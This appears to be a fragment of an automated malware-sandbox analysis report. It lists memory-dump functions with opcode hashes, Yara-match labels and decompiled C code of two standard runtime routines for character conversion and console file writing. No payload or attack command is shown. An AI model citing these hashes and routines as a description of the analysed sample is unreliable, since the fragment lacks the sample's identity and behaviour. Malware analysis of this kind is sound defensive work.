                • Instruction Fuzzy Hash: 9E215C765097C08FD703CB20E990B55BFB1AB57208F29C5DED4848B6A3C33A9807CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 023D8244, Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327530649.00000000023D0000.00000040.00000040.sdmp, Offset: 023D0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d30c4d499c0a13ed05843abae1e17c81f7c4357f3dca1f23a7a8f3558f19d3ad
                • Instruction ID: 958af489d5dac22b655928ae53eba445bb6cb916f8f011b7004976c69c9c502c
                • Opcode Fuzzy Hash: d30c4d499c0a13ed05843abae1e17c81f7c4357f3dca1f23a7a8f3558f19d3ad
                • Instruction Fuzzy Hash: D7110632204740DFD715CB14E980B26BBA5EF88718F28C9ADE8490B643C77BE803CA51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E11DF, Relevance: .1, Instructions: 54COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4555a76dc39c69151e45bb19373beb772d37d5223c5f46b1a167e7cf52720fc
                • Instruction ID: b48c09781363755a3f0c6cf2cd39ad8bbf7e15ca785e03ba7a4e1084ce0d0f9d
                • Opcode Fuzzy Hash: f4555a76dc39c69151e45bb19373beb772d37d5223c5f46b1a167e7cf52720fc
                • Instruction Fuzzy Hash: C4117C303092808FC7069B39D8289797FF6AF8620071945FBD082CF367CB71AC099B52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E05B9, Relevance: .1, Instructions: 51COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43076232df3dfd963639a51efda03a39b139ef578760025d69693fc8c434dca4
                • Instruction ID: 23f3d5b8bec5c5be9e4bf99791a9be3997aeeb6a8687df15ec9f4c0f9503a415
                • Opcode Fuzzy Hash: 43076232df3dfd963639a51efda03a39b139ef578760025d69693fc8c434dca4
                • Instruction Fuzzy Hash: 4F01F2203142A04FCA8A237E64312BF6B9BAFD6900718449AE049DB3D9CCB06C0653DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 023D05CF, Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327530649.00000000023D0000.00000040.00000040.sdmp, Offset: 023D0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5be35a739b87e9acbf10f884154c33e6fc4f65ceaf1bb9f603a89c7b40624cd
                • Instruction ID: 5b17cc5ccf1d10412520af6676403dd49454576cd9262e56c6e7379b6ddba3db
                • Opcode Fuzzy Hash: d5be35a739b87e9acbf10f884154c33e6fc4f65ceaf1bb9f603a89c7b40624cd
                • Instruction Fuzzy Hash: 0C01A7765097806FD7128B15AC408B2FFB8DE86620709C49FE8898B612D125A908CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E05C8, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d767c405536e9309f8f12548c21d7fa8f79c250b3df346c8f344ec609467d19
                • Instruction ID: 322d55b0bc7d715fd96b1320a9d61e18addd942b9c35f4ddd3437034aed42d8e
                • Opcode Fuzzy Hash: 3d767c405536e9309f8f12548c21d7fa8f79c250b3df346c8f344ec609467d19
                • Instruction Fuzzy Hash: B9F090217212208FC98D32BE64216BF228B6BD5D50724442EE10AE73D8DDB0AC0713EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E1218, Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a283a361c217013c9a6e67653012a70dac19e3e6fb7132be7524dc1830f03d6b
                • Instruction ID: d5ebaf9bc5b30c439175674fc8144c6151e9e970de5776d9ab34ac2b56a43acb
                • Opcode Fuzzy Hash: a283a361c217013c9a6e67653012a70dac19e3e6fb7132be7524dc1830f03d6b
                • Instruction Fuzzy Hash: E501A430314110CBC608AB2DD45897D7BEBBFC970072144BAE406CB376DF71AC099B82
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E4180, Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2f368abaa71a4b895c70372be4cb45989ab54ee53dbb7286b620bf1c2725be4
                • Instruction ID: 99937c1cbf122bfd6383cd7566fb267afa7502924c4e45214bc9b4d706254274
                • Opcode Fuzzy Hash: d2f368abaa71a4b895c70372be4cb45989ab54ee53dbb7286b620bf1c2725be4
                • Instruction Fuzzy Hash: 24F09734B082D59FCF136B722C188FABF7ACEA70803000CBBD896C2002E17320159261
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0908, Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 554072d40741ec8c6d3624147dcc4a2ce6237b35555ed40cce0acc65728f2c71
                • Instruction ID: 9b20594142b4fe606ea7535c397410d7ca31fcc9be31a477c9104e5bed96c2d4
                • Opcode Fuzzy Hash: 554072d40741ec8c6d3624147dcc4a2ce6237b35555ed40cce0acc65728f2c71
                • Instruction Fuzzy Hash: 5AF0E230B183A88FD3025FF6881857B7FEA9F46240B010CB68B429B201E9E47952B241
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E238F, Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 92848d4910f19bf8b039ec1805a1ce6f9a0f450e8fe4442a883b6eacb8b2784d
                • Instruction ID: 3c0c626c25ffca2ab009e6b2a4b3bb29f12b1e7a5065d67241e3c89bc9cea203
                • Opcode Fuzzy Hash: 92848d4910f19bf8b039ec1805a1ce6f9a0f450e8fe4442a883b6eacb8b2784d
                • Instruction Fuzzy Hash: 85F08C30A08286CFDB129F62C025ABABB76FB41308F1008E4C0425AA00EB707543EF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0918, Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9723b14473c993440d2af62c0fb31464c7958920aceea5e6e7a82b650386cc81
                • Instruction ID: 8654c7f6abeed29232a6f2a11ab2f822c55105587ab1fad1b8fdee957ba4a352
                • Opcode Fuzzy Hash: 9723b14473c993440d2af62c0fb31464c7958920aceea5e6e7a82b650386cc81
                • Instruction Fuzzy Hash: 63E0E532F1522C9ADB115AF6A8441BFBBAA9785250F004D379F0793200F9F069056291
                Uniqueness

                Uniqueness Score: -1.00%

                Function 023D8300, Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327530649.00000000023D0000.00000040.00000040.sdmp, Offset: 023D0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction ID: 355d1dd77a6ed3bb6036cfd7d6d6bcf4e8e67a1f682d7e8162dcbcf8ecbf02a9
                • Opcode Fuzzy Hash: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction Fuzzy Hash: 48F0FB35148644DFC206CF44D540B15FBA6EB89718F24C6A9E9491BA52C737A813DA81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 023D05F6, Relevance: .0, Instructions: 27COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327530649.00000000023D0000.00000040.00000040.sdmp, Offset: 023D0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59c78feec61bfc28df92294bf5cfb985ef5fa993944a3b3d13256b85b0cd814d
                • Instruction ID: bca80037e96d79072e578c3e839f106c0fefdf8c292133b90b58502fa0fcfb06
                • Opcode Fuzzy Hash: 59c78feec61bfc28df92294bf5cfb985ef5fa993944a3b3d13256b85b0cd814d
                • Instruction Fuzzy Hash: B2E06D76A006009BD750CF0AEC45466F7A4EB84A30B08C47FDC0D8B701E536B508CAA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E2D20, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b7dcd504f027df488b1f84071c4225e91cfa8fab46c0c43cc0c22649f9d2413
                • Instruction ID: 0a8010cde42806b1bde6e35b4718da640d93526b3aa3f99ded7b409a79e30154
                • Opcode Fuzzy Hash: 5b7dcd504f027df488b1f84071c4225e91cfa8fab46c0c43cc0c22649f9d2413
                • Instruction Fuzzy Hash: 31D05E2824D3C49EC31303A9582ABB17F3E8F0B302F180DF3E2CA8C0D3A440B4A29316
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E064F, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f78c2f41d132ac6238f6c93e70f02c47c9ec8c3bcfa1abe5a41b26bb1c589205
                • Instruction ID: 09bb777183eb5519c775d61dc27bf05678ac5f5bf5f6dcb6dade69034b2e82db
                • Opcode Fuzzy Hash: f78c2f41d132ac6238f6c93e70f02c47c9ec8c3bcfa1abe5a41b26bb1c589205
                • Instruction Fuzzy Hash: FCD097724C8280CFC30A27B0381E1F03B52CEA3200B008DB2E84002422B0613DA3A601
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E016F, Relevance: .0, Instructions: 18COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a6422e2db1eb7773b03d990b69d728293a3a63bade55327c94fba9d025a5705
                • Instruction ID: eccba79dc1b3c862121a84cd80b0917d360a56cf5c42180bd11344ab72846ea4
                • Opcode Fuzzy Hash: 6a6422e2db1eb7773b03d990b69d728293a3a63bade55327c94fba9d025a5705
                • Instruction Fuzzy Hash: E0D05B3A651344DFCB152B74F41E46C37A6DB563113104DB9E82287BD0E939D851CA15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 022323F4, Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327361825.0000000002232000.00000040.00000001.sdmp, Offset: 02232000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86d2a04a65737f7f08221ac9b808bf48fe960aa9736d2537eaf08242c562cc59
                • Instruction ID: 0cfc65c9f1bb0e8366893d7a08661d25cc9a346c22908e20f196dfafd2b6005f
                • Opcode Fuzzy Hash: 86d2a04a65737f7f08221ac9b808bf48fe960aa9736d2537eaf08242c562cc59
                • Instruction Fuzzy Hash: 3FD05BB52145928FD3178A1CD154B553BD49B51714F4644FD9C009B667C764E981D600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0180, Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c59cb7002126b2eddfeedd7e74c6012c04f69c7694a8f235d0ae62d21d243ccf
                • Instruction ID: c6fbfc7ffbcf270b17fc97e9ad33c0a364555c4ea55ef259864c6ed108f15d3b
                • Opcode Fuzzy Hash: c59cb7002126b2eddfeedd7e74c6012c04f69c7694a8f235d0ae62d21d243ccf
                • Instruction Fuzzy Hash: 74D0123C640344CFCB182BB0F01D42C37E9EB492063104C7DE80687740EE36E860CA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E2EC0, Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86f73116d61f91814cfc4898859e7336dc1cf03b1e633cdb3054e9de78397f43
                • Instruction ID: c466243746ac08dcb05ba6fdf98783cc2b5c527a6a4872db6b4852d76bc920e5
                • Opcode Fuzzy Hash: 86f73116d61f91814cfc4898859e7336dc1cf03b1e633cdb3054e9de78397f43
                • Instruction Fuzzy Hash: FFB092312942080BEB509BF6784CB6633CC8780659F4804B5B80CC5900E546E4E02140
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0660, Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a0f03f6093118466fc2404e75c89733bff98ebd7c2f6e360d6c8df2c9c32e100
                • Instruction ID: 143c214fc980b8b0c8604be00a5143734407e0a782a73ad552c7a95a8385b4f1
                • Opcode Fuzzy Hash: a0f03f6093118466fc2404e75c89733bff98ebd7c2f6e360d6c8df2c9c32e100
                • Instruction Fuzzy Hash: E9C02B30185268CFC24517B23809539B20A56C0704300CC31D40110120DAB27471A855
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x24fab668
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x24fab668
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822b
                0x00408232
                0x00408235
                0x0040823d
                0x00408241
                0x0040824d
                0x00408250
                0x00408253
                0x0040825a
                0x00408262
                0x00408265
                0x0040826b
                0x00408271
                0x00408276
                0x00408278
                0x0040827b
                0x00408280
                0x0040828a
                0x00408291
                0x00408294
                0x0040829b
                0x004082a2
                0x004082ce
                0x004082f4
                0x004082f6
                0x00000000
                0x004082d0
                0x004082d3
                0x0040839a
                0x004083a6
                0x004083b1
                0x004083b6
                0x004082d9
                0x004082e0
                0x004082e5
                0x004082eb
                0x004082f1
                0x00000000
                0x004082f1
                0x004082eb
                0x004082d3
                0x004082a4
                0x004082a8
                0x004082ab
                0x004082b1
                0x004082b3
                0x004082b6
                0x004082ba
                0x004082f7
                0x004082fa
                0x004082fb
                0x00408300
                0x00408306
                0x0040830c
                0x0040831b
                0x00408321
                0x00408327
                0x0040832c
                0x00408348
                0x004083bb
                0x004083c1
                0x0040834a
                0x00408352
                0x0040835b
                0x00408361
                0x00000000
                0x00408363
                0x00408365
                0x00408368
                0x00408381
                0x00000000
                0x00408383
                0x00408387
                0x00408389
                0x0040838c
                0x00000000
                0x0040838c
                0x00408387
                0x00408381
                0x00408361
                0x0040835b
                0x00408348
                0x0040832c
                0x00408306
                0x00000000
                0x0040838f
                0x0040838f
                0x004083c3
                0x004083cd
                0x004083d5

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                • __fassign.LIBCMT ref: 004082E0
                • __fassign.LIBCMT ref: 004082FB
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
